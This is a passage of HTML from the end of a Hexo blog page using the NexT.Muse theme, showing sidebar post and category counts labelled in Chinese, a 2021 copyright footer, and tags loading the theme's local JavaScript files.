          <span class="site-state-item-count">37</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xxx</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/muse.js"></script>
<script src="/js/next-boot.js"></script>



  















  

  

</body>
</html>
